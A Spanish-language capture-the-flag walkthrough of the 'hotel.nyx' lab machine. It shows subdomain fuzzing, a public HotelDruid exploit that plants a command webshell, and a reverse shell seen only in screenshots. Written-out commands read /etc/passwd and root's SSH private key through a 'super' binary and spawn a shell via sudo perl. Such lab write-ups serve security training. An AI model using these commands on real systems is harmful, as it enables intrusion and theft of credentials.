Hacemos el escaneo de nmap: {{pasted_image_20240302110052.png|}} Esto corre por el puerto 80: {{pasted_image_20240302110118.png|}} Si lanzamos un whatweb nos encontramos con un email que nos indica un dominio: {{pasted_image_20240302110241.png|}} Lo añadimos al archivo hosts: {{pasted_image_20240302110312.png|}} Hacemos una búsqueda de subdominios con wfuzz y vemos el siguiente subdominio: wfuzz -c --hc=404 --hl=616 -t 200 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.hotel.nyx" -u 192.168.0.28 {{pasted_image_20240302110816.png|}} {{pasted_image_20240302110842.png|}} Tenemos esta web que pone algo de hoteldruid: {{pasted_image_20240302110951.png|}} Buscamos en github algún exploit y lo encontramos: {{pasted_image_20240302111001.png|}} Probamos el exploit: {{pasted_image_20240302111022.png|}} Y lo ejecutamos: python3 exploit.py -t http://reservations.hotel.nyx/ --noauth Vemos que ha insertado una CMD y nos pone justo la ruta para acceder a ella: http://reservations.hotel.nyx/dati/selectappartamenti.php {{pasted_image_20240302111332.png|}} {{pasted_image_20240302111315.png|}} Y ahora en este punto obtenemos una reverse shell url encodeada: {{pasted_image_20240302111531.png|}} {{pasted_image_20240302111540.png|}} {{pasted_image_20240302111548.png|}} Y vemos que podemos ejecutar perl como el usuario sun: {{pasted_image_20240302111648.png|}} Y ejecutamos el siguiente comando que podemos encontrar en gtfobins para convertirnos en el usuario sun: sudo -u sun /usr/bin/perl -e 'exec "/bin/sh";' {{pasted_image_20240302111749.png|}} Ahora si ejecutamos una búsqueda de binarios, nos llama la atención el binario de super: {{pasted_image_20240302111832.png|}} Esto nos sale si lo ejecutamos: {{pasted_image_20240302111924.png|}} Lo que nos hace pensar que al secret le podemos pasar algún archivo, por ejemplo el passwd, aunque se nos abre al reves: /usr/bin/super secret /etc/passwd {{pasted_image_20240302111944.png|}} Podemos leer el archivo id_rsa de root pasándole el comando rev para invertir el orden y así poder visualizarlo normal: /usr/bin/super secret /root/.ssh/id_rsa | rev {{pasted_image_20240302112114.png|}} Y ahora crackeamos este hash con john the ripper: {{pasted_image_20240302112228.png|}} Y ahora podemos entrar ssh utilizando este salvoconducto: {{pasted_image_20240302112351.png|}}